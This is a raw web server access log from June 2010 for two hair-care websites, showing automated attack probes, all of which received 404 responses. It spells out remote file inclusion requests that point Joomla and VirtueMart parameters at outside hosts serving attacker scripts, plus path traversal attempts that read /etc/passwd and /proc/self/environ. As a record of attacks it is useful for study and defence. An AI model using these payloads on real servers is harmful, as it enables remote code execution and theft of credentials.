81.93.240.99 - - [13/Jun/2010:21:45:11 -0700] "GET /index.php?DOCUMENT_ROOT=http://www.vincenttractors.co.uk/images/cache/myid.jpg? HTTP/1.1" 404 - "-" "libwww-perl/5.805" "www.freehairsecrets.com"
81.93.240.99 - - [13/Jun/2010:21:45:11 -0700] "GET /logs//index.php?DOCUMENT_ROOT=http://www.vincenttractors.co.uk/images/cache/myid.jpg? HTTP/1.1" 404 - "-" "libwww-perl/5.805" "www.freehairsecrets.com"
81.93.240.122 - - [13/Jun/2010:21:45:17 -0700] "GET /logs/access.log//index.php?DOCUMENT_ROOT=http://www.vincenttractors.co.uk/images/cache/myid.jpg? HTTP/1.1" 404 - "-" "libwww-perl/5.805" "www.freehairsecrets.com"
81.93.240.122 - - [13/Jun/2010:21:45:17 -0700] "GET /index.php?DOCUMENT_ROOT=http://www.vincenttractors.co.uk/images/cache/myid.jpg? HTTP/1.1" 404 - "-" "libwww-perl/5.805" "www.freehairsecrets.com"
81.93.240.122 - - [13/Jun/2010:21:45:18 -0700] "GET /logs//index.php?DOCUMENT_ROOT=http://www.vincenttractors.co.uk/images/cache/myid.jpg? HTTP/1.1" 404 - "-" "libwww-perl/5.805" "www.freehairsecrets.com"
125.141.91.138 - - [13/Jun/2010:21:45:22 -0700] "GET /contenido/includes/include.newsletter_jobs_subnav.php?cfg[path][contenido]=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 - "-" "libwww-perl/5.805" "growlonghairfast.com"
81.93.240.60 - - [13/Jun/2010:21:45:54 -0700] "GET /logs/access.log//index.php?DOCUMENT_ROOT=http://www.vincenttractors.co.uk/images/cache/myid.jpg? HTTP/1.1" 404 - "-" "libwww-perl/5.805" "www.freehairsecrets.com"
81.93.240.60 - - [13/Jun/2010:21:45:54 -0700] "GET /index.php?DOCUMENT_ROOT=http://www.vincenttractors.co.uk/images/cache/myid.jpg? HTTP/1.1" 404 - "-" "libwww-perl/5.805" "www.freehairsecrets.com"
81.93.240.60 - - [13/Jun/2010:21:45:54 -0700] "GET /logs//index.php?DOCUMENT_ROOT=http://www.vincenttractors.co.uk/images/cache/myid.jpg? HTTP/1.1" 404 - "-" "libwww-perl/5.805" "www.freehairsecrets.com"
81.93.240.63 - - [13/Jun/2010:21:47:22 -0700] "GET /logs/access.log//index.php?DOCUMENT_ROOT=http://www.vincenttractors.co.uk/images/cache/myid.jpg? HTTP/1.1" 404 - "-" "libwww-perl/5.805" "www.freehairsecrets.com"
81.93.240.63 - - [13/Jun/2010:21:47:22 -0700] "GET /index.php?DOCUMENT_ROOT=http://www.vincenttractors.co.uk/images/cache/myid.jpg? HTTP/1.1" 404 - "-" "libwww-perl/5.805" "www.freehairsecrets.com"
81.93.240.63 - - [13/Jun/2010:21:47:23 -0700] "GET /logs//index.php?DOCUMENT_ROOT=http://www.vincenttractors.co.uk/images/cache/myid.jpg? HTTP/1.1" 404 - "-" "libwww-perl/5.805" "www.freehairsecrets.com"
174.121.237.135 - - [13/Jun/2010:21:48:47 -0700] "GET /logs/access.log//administrator/components/com_virtuemart/export.php?mosConfig_absolute_path=http://phamsight.com/docs/images/head?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.freehairsecrets.com"
174.121.237.135 - - [13/Jun/2010:21:48:47 -0700] "GET /logs/access.log//administrator/components/com_virtuemart/export.php?mosConfig_absolute_path=http://phamsight.com/docs/images/head?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "growlonghairfast.com"
174.121.237.135 - - [13/Jun/2010:21:48:49 -0700] "GET /logs/access_100125.log//administrator/components/com_virtuemart/export.php?mosConfig_absolute_path=http://phamsight.com/docs/images/head?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "growlonghairfast.com"
92.103.254.153 - - [13/Jun/2010:21:49:20 -0700] "GET /logs/access.log//index.php?DOCUMENT_ROOT=http://v14ch.fileave.com/myid.jpg? HTTP/1.1" 404 - "-" "libwww-perl/5.805" "www.freehairsecrets.com"
92.103.254.153 - - [13/Jun/2010:21:49:20 -0700] "GET /index.php?DOCUMENT_ROOT=http://v14ch.fileave.com/myid.jpg? HTTP/1.1" 404 - "-" "libwww-perl/5.805" "www.freehairsecrets.com"
92.103.254.153 - - [13/Jun/2010:21:49:20 -0700] "GET /logs//index.php?DOCUMENT_ROOT=http://v14ch.fileave.com/myid.jpg? HTTP/1.1" 404 - "-" "libwww-perl/5.805" "www.freehairsecrets.com"
174.121.237.135 - - [13/Jun/2010:21:50:55 -0700] "GET /logs//administrator/components/com_virtuemart/export.php?mosConfig_absolute_path=http://phamsight.com/docs/images/head?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "growlonghairfast.com"
174.121.237.135 - - [13/Jun/2010:21:50:55 -0700] "GET /logs/access_100201.log%20%20//administrator/components/com_virtuemart/export.php?mosConfig_absolute_path=http://phamsight.com/docs/images/head?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "growlonghairfast.com"
174.121.237.135 - - [13/Jun/2010:21:50:55 -0700] "GET /administrator/components/com_virtuemart/export.php?mosConfig_absolute_path=http://phamsight.com/docs/images/head?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "growlonghairfast.com"
205.134.252.26 - - [13/Jun/2010:21:53:26 -0700] "GET /logs//components/com_sitemap/sitemap.xml.php?mosConfig_absolute_path=http://nic.bupt.edu.cn/media/j1.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.freehairsecrets.com"
205.134.252.26 - - [13/Jun/2010:21:53:26 -0700] "GET /components/com_sitemap/sitemap.xml.php?mosConfig_absolute_path=http://nic.bupt.edu.cn/media/j1.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.freehairsecrets.com"
205.134.252.26 - - [13/Jun/2010:21:53:26 -0700] "GET /logs/access.log//components/com_sitemap/sitemap.xml.php?mosConfig_absolute_path=http://nic.bupt.edu.cn/media/j1.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.freehairsecrets.com"
205.134.252.26 - - [13/Jun/2010:21:53:28 -0700] "GET /components/com_sitemap/sitemap.xml.php?mosConfig_absolute_path=http://nic.bupt.edu.cn/media/j1.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.freehairsecrets.com"
205.134.252.26 - - [13/Jun/2010:21:53:28 -0700] "GET /logs//components/com_sitemap/sitemap.xml.php?mosConfig_absolute_path=http://nic.bupt.edu.cn/media/j1.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.freehairsecrets.com"
205.134.252.26 - - [13/Jun/2010:21:53:28 -0700] "GET /logs/access.log//components/com_sitemap/sitemap.xml.php?mosConfig_absolute_path=http://nic.bupt.edu.cn/media/j1.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.freehairsecrets.com"
205.134.252.26 - - [13/Jun/2010:21:53:29 -0700] "GET /logs//components/com_sitemap/sitemap.xml.php?mosConfig_absolute_path=http://nic.bupt.edu.cn/media/j1.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.freehairsecrets.com"
205.134.252.26 - - [13/Jun/2010:21:53:29 -0700] "GET /logs/access.log%20%20//components/com_sitemap/sitemap.xml.php?mosConfig_absolute_path=http://nic.bupt.edu.cn/media/j1.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.freehairsecrets.com"
205.134.252.26 - - [13/Jun/2010:21:53:29 -0700] "GET /components/com_sitemap/sitemap.xml.php?mosConfig_absolute_path=http://nic.bupt.edu.cn/media/j1.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.freehairsecrets.com"
205.134.252.26 - - [13/Jun/2010:21:53:29 -0700] "GET /components/com_sitemap/sitemap.xml.php?mosConfig_absolute_path=http://nic.bupt.edu.cn/media/j1.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.freehairsecrets.com"
205.134.252.26 - - [13/Jun/2010:21:53:29 -0700] "GET /logs//components/com_sitemap/sitemap.xml.php?mosConfig_absolute_path=http://nic.bupt.edu.cn/media/j1.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.freehairsecrets.com"
205.134.252.26 - - [13/Jun/2010:21:53:29 -0700] "GET /logs/access.log%20%20//components/com_sitemap/sitemap.xml.php?mosConfig_absolute_path=http://nic.bupt.edu.cn/media/j1.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.freehairsecrets.com"
205.134.252.26 - - [13/Jun/2010:21:53:46 -0700] "GET /components/com_sitemap/sitemap.xml.php?mosConfig_absolute_path=http://nic.bupt.edu.cn/media/j1.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "growlonghairfast.com"
205.134.252.26 - - [13/Jun/2010:21:53:46 -0700] "GET /logs/access_100125.log//components/com_sitemap/sitemap.xml.php?mosConfig_absolute_path=http://nic.bupt.edu.cn/media/j1.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "growlonghairfast.com"
205.134.252.26 - - [13/Jun/2010:21:53:46 -0700] "GET /logs//components/com_sitemap/sitemap.xml.php?mosConfig_absolute_path=http://nic.bupt.edu.cn/media/j1.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "growlonghairfast.com"
205.134.252.26 - - [13/Jun/2010:21:53:53 -0700] "GET /components/com_sitemap/sitemap.xml.php?mosConfig_absolute_path=http://nic.bupt.edu.cn/media/j1.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "growlonghairfast.com"
205.134.252.26 - - [13/Jun/2010:21:53:53 -0700] "GET /logs//components/com_sitemap/sitemap.xml.php?mosConfig_absolute_path=http://nic.bupt.edu.cn/media/j1.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "growlonghairfast.com"
205.134.252.26 - - [13/Jun/2010:21:53:53 -0700] "GET /logs/access_100125.log//components/com_sitemap/sitemap.xml.php?mosConfig_absolute_path=http://nic.bupt.edu.cn/media/j1.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "growlonghairfast.com"
205.134.252.26 - - [13/Jun/2010:21:53:53 -0700] "GET /logs/access.log//components/com_sitemap/sitemap.xml.php?mosConfig_absolute_path=http://nic.bupt.edu.cn/media/j1.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "growlonghairfast.com"
74.124.198.60 - - [13/Jun/2010:21:54:17 -0700] "GET /administrator/components/com_virtuemart/export.php?mosConfig_absolute_path=http://phamsight.com/docs/images/head?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "growlonghairfast.com"
74.124.198.60 - - [13/Jun/2010:21:54:17 -0700] "GET /logs/access_100125.log//administrator/components/com_virtuemart/export.php?mosConfig_absolute_path=http://phamsight.com/docs/images/head?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "growlonghairfast.com"
74.124.198.60 - - [13/Jun/2010:21:54:17 -0700] "GET /logs//administrator/components/com_virtuemart/export.php?mosConfig_absolute_path=http://phamsight.com/docs/images/head?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "growlonghairfast.com"
174.37.143.198 - - [13/Jun/2010:21:54:28 -0700] "GET /logs/access.log//contenido/includes/include.newsletter_jobs_subnav.php?cfg[path][contenido]=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 - "-" "libwww-perl/5.834" "growlonghairfast.com"
174.37.143.198 - - [13/Jun/2010:21:54:28 -0700] "GET /contenido/includes/include.newsletter_jobs_subnav.php?cfg[path][contenido]=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 - "-" "libwww-perl/5.834" "growlonghairfast.com"
174.37.143.198 - - [13/Jun/2010:21:54:28 -0700] "GET /logs//contenido/includes/include.newsletter_jobs_subnav.php?cfg[path][contenido]=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 - "-" "libwww-perl/5.834" "growlonghairfast.com"
74.124.198.60 - - [13/Jun/2010:21:54:49 -0700] "GET /administrator/components/com_virtuemart/export.php?mosConfig_absolute_path=http://phamsight.com/docs/images/head?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "growlonghairfast.com"
74.124.198.60 - - [13/Jun/2010:21:54:49 -0700] "GET /logs/access_100125.log//administrator/components/com_virtuemart/export.php?mosConfig_absolute_path=http://phamsight.com/docs/images/head?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "growlonghairfast.com"
74.124.198.60 - - [13/Jun/2010:21:54:49 -0700] "GET /logs//administrator/components/com_virtuemart/export.php?mosConfig_absolute_path=http://phamsight.com/docs/images/head?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "growlonghairfast.com"
205.134.252.26 - - [13/Jun/2010:21:55:03 -0700] "GET /components/com_sitemap/sitemap.xml.php?mosConfig_absolute_path=http://nic.bupt.edu.cn/media/j1.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "growlonghairfast.com"
205.134.252.26 - - [13/Jun/2010:21:55:03 -0700] "GET /logs//components/com_sitemap/sitemap.xml.php?mosConfig_absolute_path=http://nic.bupt.edu.cn/media/j1.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "growlonghairfast.com"
205.134.252.26 - - [13/Jun/2010:21:55:03 -0700] "GET /logs/access_100125.log%20%20//components/com_sitemap/sitemap.xml.php?mosConfig_absolute_path=http://nic.bupt.edu.cn/media/j1.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "growlonghairfast.com"
205.134.252.26 - - [13/Jun/2010:21:55:05 -0700] "GET /components/com_sitemap/sitemap.xml.php?mosConfig_absolute_path=http://nic.bupt.edu.cn/media/j1.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "growlonghairfast.com"
205.134.252.26 - - [13/Jun/2010:21:55:05 -0700] "GET /logs//components/com_sitemap/sitemap.xml.php?mosConfig_absolute_path=http://nic.bupt.edu.cn/media/j1.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "growlonghairfast.com"
205.134.252.26 - - [13/Jun/2010:21:55:05 -0700] "GET /logs/access_100125.log%20%20//components/com_sitemap/sitemap.xml.php?mosConfig_absolute_path=http://nic.bupt.edu.cn/media/j1.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "growlonghairfast.com"
205.134.252.26 - - [13/Jun/2010:21:55:08 -0700] "GET /logs/access.log%20%20//components/com_sitemap/sitemap.xml.php?mosConfig_absolute_path=http://nic.bupt.edu.cn/media/j1.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "growlonghairfast.com"
205.134.252.26 - - [13/Jun/2010:21:55:10 -0700] "GET /logs/access.log%20%20//components/com_sitemap/sitemap.xml.php?mosConfig_absolute_path=http://nic.bupt.edu.cn/media/j1.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "growlonghairfast.com"
74.124.198.60 - - [13/Jun/2010:21:56:28 -0700] "GET /administrator/components/com_virtuemart/export.php?mosConfig_absolute_path=http://phamsight.com/docs/images/head?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.freehairsecrets.com"
74.124.198.60 - - [13/Jun/2010:21:56:28 -0700] "GET /logs//administrator/components/com_virtuemart/export.php?mosConfig_absolute_path=http://phamsight.com/docs/images/head?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.freehairsecrets.com"
74.124.198.60 - - [13/Jun/2010:21:56:28 -0700] "GET /logs/access.log%20%20//administrator/components/com_virtuemart/export.php?mosConfig_absolute_path=http://phamsight.com/docs/images/head?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.freehairsecrets.com"
74.124.198.60 - - [13/Jun/2010:21:56:51 -0700] "GET /administrator/components/com_virtuemart/export.php?mosConfig_absolute_path=http://phamsight.com/docs/images/head?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.freehairsecrets.com"
74.124.198.60 - - [13/Jun/2010:21:56:51 -0700] "GET /logs//administrator/components/com_virtuemart/export.php?mosConfig_absolute_path=http://phamsight.com/docs/images/head?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.freehairsecrets.com"
74.124.198.60 - - [13/Jun/2010:21:56:51 -0700] "GET /logs/access.log%20%20//administrator/components/com_virtuemart/export.php?mosConfig_absolute_path=http://phamsight.com/docs/images/head?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.freehairsecrets.com"
174.121.237.135 - - [13/Jun/2010:21:56:55 -0700] "GET /logs//administrator/components/com_virtuemart/export.php?mosConfig_absolute_path=http://phamsight.com/docs/images/head?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "growlonghairfast.com"
174.121.237.135 - - [13/Jun/2010:21:56:55 -0700] "GET /logs/access_100201.log%20%20//administrator/components/com_virtuemart/export.php?mosConfig_absolute_path=http://phamsight.com/docs/images/head?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "growlonghairfast.com"
174.121.237.135 - - [13/Jun/2010:21:56:55 -0700] "GET /administrator/components/com_virtuemart/export.php?mosConfig_absolute_path=http://phamsight.com/docs/images/head?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "growlonghairfast.com"
174.121.237.135 - - [13/Jun/2010:21:57:01 -0700] "GET /logs/access_100510.log%20%20//administrator/components/com_virtuemart/export.php?mosConfig_absolute_path=http://phamsight.com/docs/images/head?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "growlonghairfast.com"
74.124.198.60 - - [13/Jun/2010:21:57:08 -0700] "GET /logs/access_100125.log%20%20//administrator/components/com_virtuemart/export.php?mosConfig_absolute_path=http://phamsight.com/docs/images/head?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "growlonghairfast.com"
74.124.198.60 - - [13/Jun/2010:21:57:12 -0700] "GET /logs/access_100125.log%20%20//administrator/components/com_virtuemart/export.php?mosConfig_absolute_path=http://phamsight.com/docs/images/head?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "growlonghairfast.com"
174.121.237.135 - - [13/Jun/2010:21:57:24 -0700] "GET /logs/access_100125.log//administrator/components/com_virtuemart/export.php?mosConfig_absolute_path=http://phamsight.com/docs/images/head?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "growlonghairfast.com"
174.121.237.135 - - [13/Jun/2010:21:57:24 -0700] "GET /administrator/components/com_virtuemart/export.php?mosConfig_absolute_path=http://phamsight.com/docs/images/head?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "growlonghairfast.com"
174.121.237.135 - - [13/Jun/2010:21:57:24 -0700] "GET /logs//administrator/components/com_virtuemart/export.php?mosConfig_absolute_path=http://phamsight.com/docs/images/head?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "growlonghairfast.com"
77.88.25.28 - - [13/Jun/2010:21:57:58 -0700] "GET /freehairsecretsphp/vie HTTP/1.1" 404 - "-" "Yandex/1.01.001 (compatible; Win16; I)" "growlonghairfast.com"
74.124.198.60 - - [13/Jun/2010:21:58:18 -0700] "GET /administrator/components/com_virtuemart/export.php?mosConfig_absolute_path=http://phamsight.com/docs/images/head?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "growlonghairfast.com"
74.124.198.60 - - [13/Jun/2010:21:58:18 -0700] "GET /logs//administrator/components/com_virtuemart/export.php?mosConfig_absolute_path=http://phamsight.com/docs/images/head?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "growlonghairfast.com"
74.124.198.60 - - [13/Jun/2010:21:58:18 -0700] "GET /logs/access_100208.log%20%20//administrator/components/com_virtuemart/export.php?mosConfig_absolute_path=http://phamsight.com/docs/images/head?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "growlonghairfast.com"
74.124.198.60 - - [13/Jun/2010:21:58:22 -0700] "GET /administrator/components/com_virtuemart/export.php?mosConfig_absolute_path=http://phamsight.com/docs/images/head?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "growlonghairfast.com"
74.124.198.60 - - [13/Jun/2010:21:58:22 -0700] "GET /logs//administrator/components/com_virtuemart/export.php?mosConfig_absolute_path=http://phamsight.com/docs/images/head?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "growlonghairfast.com"
74.124.198.60 - - [13/Jun/2010:21:58:22 -0700] "GET /logs/access_100208.log%20%20//administrator/components/com_virtuemart/export.php?mosConfig_absolute_path=http://phamsight.com/docs/images/head?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "growlonghairfast.com"
174.121.237.135 - - [13/Jun/2010:21:58:44 -0700] "GET /logs/access.log%20%20//administrator/components/com_virtuemart/export.php?mosConfig_absolute_path=http://phamsight.com/docs/images/head?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.freehairsecrets.com"
174.121.237.135 - - [13/Jun/2010:21:58:44 -0700] "GET /logs//administrator/components/com_virtuemart/export.php?mosConfig_absolute_path=http://phamsight.com/docs/images/head?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.freehairsecrets.com"
174.121.237.135 - - [13/Jun/2010:21:58:44 -0700] "GET /administrator/components/com_virtuemart/export.php?mosConfig_absolute_path=http://phamsight.com/docs/images/head?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.freehairsecrets.com"
62.219.199.50 - - [13/Jun/2010:21:58:52 -0700] "GET /index.php?option=com_redtwitter&view=../../../../../../../../../../../../../../../etc/passwd%00 HTTP/1.1" 404 - "-" "libwww-perl/5.805" "growlonghairfast.com"
74.124.198.60 - - [13/Jun/2010:21:59:16 -0700] "GET /logs/access_100118.log%20%20//administrator/components/com_virtuemart/export.php?mosConfig_absolute_path=http://phamsight.com/docs/images/head?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "growlonghairfast.com"
74.124.198.60 - - [13/Jun/2010:21:59:18 -0700] "GET /logs/access_100118.log%20%20//administrator/components/com_virtuemart/export.php?mosConfig_absolute_path=http://phamsight.com/docs/images/head?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "growlonghairfast.com"
74.124.198.60 - - [13/Jun/2010:21:59:32 -0700] "GET /logs/access_100412.log%20%20//administrator/components/com_virtuemart/export.php?mosConfig_absolute_path=http://phamsight.com/docs/images/head?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "growlonghairfast.com"
74.124.198.60 - - [13/Jun/2010:21:59:32 -0700] "GET /logs/access_100412.log%20%20//administrator/components/com_virtuemart/export.php?mosConfig_absolute_path=http://phamsight.com/docs/images/head?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "growlonghairfast.com"
174.121.237.135 - - [13/Jun/2010:22:00:06 -0700] "GET /administrator/components/com_virtuemart/export.php?mosConfig_absolute_path=http://phamsight.com/docs/images/head?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "growlonghairfast.com"
174.121.237.135 - - [13/Jun/2010:22:00:06 -0700] "GET /logs//administrator/components/com_virtuemart/export.php?mosConfig_absolute_path=http://phamsight.com/docs/images/head?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "growlonghairfast.com"
174.121.237.135 - - [13/Jun/2010:22:00:07 -0700] "GET /logs/access_100510.log//administrator/components/com_virtuemart/export.php?mosConfig_absolute_path=http://phamsight.com/docs/images/head?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "growlonghairfast.com"
74.124.198.60 - - [13/Jun/2010:22:00:23 -0700] "GET /administrator/components/com_virtuemart/export.php?mosConfig_absolute_path=http://phamsight.com/docs/images/head?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.freehairsecrets.com"
74.124.198.60 - - [13/Jun/2010:22:00:23 -0700] "GET /administrator/components/com_virtuemart/export.php?mosConfig_absolute_path=http://phamsight.com/docs/images/head?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.freehairsecrets.com"
74.124.198.60 - - [13/Jun/2010:22:00:23 -0700] "GET /logs//administrator/components/com_virtuemart/export.php?mosConfig_absolute_path=http://phamsight.com/docs/images/head?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.freehairsecrets.com"
74.124.198.60 - - [13/Jun/2010:22:00:23 -0700] "GET /logs/access.log%20%20//administrator/components/com_virtuemart/export.php?mosConfig_absolute_path=http://phamsight.com/docs/images/head?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.freehairsecrets.com"
74.124.198.60 - - [13/Jun/2010:22:00:23 -0700] "GET /logs//administrator/components/com_virtuemart/export.php?mosConfig_absolute_path=http://phamsight.com/docs/images/head?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.freehairsecrets.com"
74.124.198.60 - - [13/Jun/2010:22:00:23 -0700] "GET /logs/access.log%20%20//administrator/components/com_virtuemart/export.php?mosConfig_absolute_path=http://phamsight.com/docs/images/head?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.freehairsecrets.com"
114.108.151.149 - - [13/Jun/2010:22:00:35 -0700] "GET /logs/access_100125.log//index.php?DOCUMENT_ROOT=http://www.badmintonyukon.ca/logs/id.jpg? HTTP/1.1" 404 - "-" "libwww-perl/5.805" "growlonghairfast.com"
62.219.199.50 - - [13/Jun/2010:22:00:36 -0700] "GET /logs/access.log//index.php?option=com_redtwitter&view=../../../../../../../../../../../../../../../etc/passwd%00 HTTP/1.1" 404 - "-" "libwww-perl/5.805" "growlonghairfast.com"
62.219.199.50 - - [13/Jun/2010:22:00:37 -0700] "GET /index.php?option=com_redtwitter&view=../../../../../../../../../../../../../../../etc/passwd%00 HTTP/1.1" 404 - "-" "libwww-perl/5.805" "growlonghairfast.com"
62.219.199.50 - - [13/Jun/2010:22:00:37 -0700] "GET /logs//index.php?option=com_redtwitter&view=../../../../../../../../../../../../../../../etc/passwd%00 HTTP/1.1" 404 - "-" "libwww-perl/5.805" "growlonghairfast.com"
174.121.237.135 - - [13/Jun/2010:22:00:41 -0700] "GET /logs/access_100125.log%20%20//administrator/components/com_virtuemart/export.php?mosConfig_absolute_path=http://phamsight.com/docs/images/head?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "growlonghairfast.com"
114.108.151.149 - - [13/Jun/2010:22:00:42 -0700] "GET /logs/access_100125.log//index.php?DOCUMENT_ROOT=http://www.badmintonyukon.ca/logs/id.jpg? HTTP/1.1" 404 - "-" "libwww-perl/5.805" "growlonghairfast.com"
62.219.199.50 - - [13/Jun/2010:22:00:45 -0700] "GET /logs/access_100412.log//index.php?option=com_redtwitter&view=../../../../../../../../../../../../../../../etc/passwd%00 HTTP/1.1" 404 - "-" "libwww-perl/5.805" "growlonghairfast.com"
74.124.198.60 - - [13/Jun/2010:22:00:48 -0700] "GET /administrator/components/com_virtuemart/export.php?mosConfig_absolute_path=http://phamsight.com/docs/images/head?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.freehairsecrets.com"
